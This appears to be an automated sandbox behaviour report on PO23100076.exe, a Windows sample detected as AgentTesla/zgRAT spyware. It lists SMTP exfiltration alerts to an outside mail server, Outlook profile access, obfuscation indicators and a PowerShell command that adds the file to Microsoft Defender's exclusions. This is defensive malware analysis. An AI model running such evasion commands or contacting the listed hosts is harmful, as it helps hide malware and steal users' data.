Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49702 -> 199.79.62.115:587
Source: Network traffic	Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49702 -> 199.79.62.115:587

Source: global traffic

TCP traffic: 192.168.2.7:49702 -> 199.79.62.115:587

Source: global traffic

TCP traffic: 192.168.2.7:49588 -> 1.1.1.1:53

Source: Joe Sandbox View

IP Address: 199.79.62.115 199.79.62.115

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: global traffic

TCP traffic: 192.168.2.7:49702 -> 199.79.62.115:587

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: mail.mbarieservicesltd.com

Source: PO23100076.exe, 00000008.00000002.2489325941.0000000002A7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.mbarieservicesltd.com
Source: PO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE

Matched rule: Detects zgRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: PO23100076.exe, Program.cs

Large array initialization: : array initializer size 584046

Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE44F1	0_2_04AE44F1
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE397C	0_2_04AE397C
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE0414	0_2_04AE0414
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE4510	0_2_04AE4510
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE2548	0_2_04AE2548
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_04AE2558	0_2_04AE2558
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06828740	0_2_06828740
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_068203B8	0_2_068203B8
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_0682B828	0_2_0682B828
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06828730	0_2_06828730
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06828449	0_2_06828449
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06828458	0_2_06828458
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_068203B5	0_2_068203B5
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_0682AC78	0_2_0682AC78
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06821A3A	0_2_06821A3A
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_0682B818	0_2_0682B818
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F00040	0_2_06F00040
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F05738	0_2_06F05738
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F02CFD	0_2_06F02CFD
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F02D18	0_2_06F02D18
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F05300	0_2_06F05300
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F00028	0_2_06F00028
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F04950	0_2_06F04950
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F03150	0_2_06F03150
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 0_2_06F03148	0_2_06F03148
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_04EA4140	8_2_04EA4140
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_04EA4D58	8_2_04EA4D58
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_04EA4488	8_2_04EA4488
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_062C1CB0	8_2_062C1CB0
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_062C3D08	8_2_062C3D08
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_0647CA38	8_2_0647CA38
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_06476B58	8_2_06476B58
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_06470040	8_2_06470040
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_06479CC0	8_2_06479CC0
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_06474210	8_2_06474210
Source: C:\Users\user\Desktop\PO23100076.exe	Code function: 8_2_0647A443	8_2_0647A443

Source: PO23100076.exe, 00000000.00000002.1273050070.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1277345753.000000000698F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1277551118.0000000006C20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1270177045.000000000095E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1273725134.00000000035D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO23100076.exe
Source: PO23100076.exe, 00000000.00000002.1276854543.00000000067B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO23100076.exe
Source: PO23100076.exe, 00000008.00000002.2487417203.0000000000AF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PO23100076.exe
Source: PO23100076.exe, 00000008.00000002.2487084327.000000000042C000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs PO23100076.exe
Source: PO23100076.exe	Binary or memory string: OriginalFilenamejcwP.exe@ vs PO23100076.exe

Source: PO23100076.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.PO23100076.exe.35f88d8.0.raw.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: PO23100076.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, O.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO23100076.exe.37f7348.1.raw.unpack, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, nteQjLvwvZrNfpr2GT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, nteQjLvwvZrNfpr2GT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/6@3/1

Source: C:\Users\user\Desktop\PO23100076.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO23100076.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqwcyacm.xrf.ps1

Jump to behavior

Source: PO23100076.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO23100076.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PO23100076.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PO23100076.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PO23100076.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO23100076.exe	ReversingLabs: Detection: 44%
Source: PO23100076.exe	Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Process created: C:\Users\user\Desktop\PO23100076.exe "C:\Users\user\Desktop\PO23100076.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO23100076.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PO23100076.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PO23100076.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO23100076.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO23100076.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.cs

.Net Code: X2WPMWey8AqqJOPa61l(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{X2WPMWey8AqqJOPa61l(typeof(IntPtr).TypeHandle),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	.Net Code: MhbL3HrjYh5e9bS83ig System.Reflection.Assembly.Load(byte[])
Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	.Net Code: MhbL3HrjYh5e9bS83ig System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\PO23100076.exe

Code function: 0_2_06F0970D push FFFFFF8Bh; iretd

0_2_06F0970F

Source: PO23100076.exe

Static PE information: section name: .text entropy: 7.913866005602331

Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, noPojjR9Pn5xTJrT9R.cs	High entropy of concatenated method names: 'JLWWudGB1e', 'sTeWdncUnC', 'WxQWRgxTq9', 'Cf6WO9NhvJ', 'dPpW0nS4Dk', 'M5ZWldUVNO', 'V1DWpG9bAF', 'sYhW1mBRem', 'zU4W6w5S1F', 'EooWPmSjSl'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, kV0lI2rrtIrCxmKWuK.cs	High entropy of concatenated method names: 'HJryAVM8Nv', 's6DycCk2Jl', 'UByyvp6TDq', 'DefyrDl00H', 'WKJyWXRsdf', 'CREyanhe3p', 't0xyMGhHTD', 'IRIy9F6mfS', 'VwByVFn30E', 'Y1WyKchxqA'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, aOw9dL5yUKMCSOO6YU.cs	High entropy of concatenated method names: 'CtfogPOuIl', 'Kgbo2hVwmc', 'ppNoFZATM3', 'gEnoyqwEHj', 'rdhoB30ZJv', 'xmUoYYkdrb', 'MZwotLZWZT', 'GJro586mRi', 'xKDoZ1mhXJ', 'GjEoiFSyCP'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, qfXQtGmpukQKEpK3iy.cs	High entropy of concatenated method names: 'ToString', 'QEsaeniyil', 'Hqma0Y9Oo2', 'qLsaldZAON', 'qUdapcIAih', 'ADfa17pFFv', 'svea6dPGID', 'HGKaPeeL4Z', 'u2nakjbrLJ', 'rf2aTifW6a'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, fTiLHoCEAqncxaWftsR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'enFKeG5OAY', 'kKaKdFJWGB', 'a7jKbkX3qj', 'GW5KR0CnC1', 'tRUKOfpRjy', 'fnSKmSr0hU', 'V65Khr4yE7'
Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, zWtfYdXOcyqZfalbPR.cs	High entropy of concatenated method names: 'IGNjPLyC4', 'v3dACNbf5', 'IojcAeTeQ', 'UZsnKZ5In', 'pg1rp37OA', 'Qfaqo13qC', 'p1vdLrKiO9xD1yZreq', 'sBShIOC23VmvWpuD5K', 'Rn09lPxHU', 'cQCKvAsqJ'
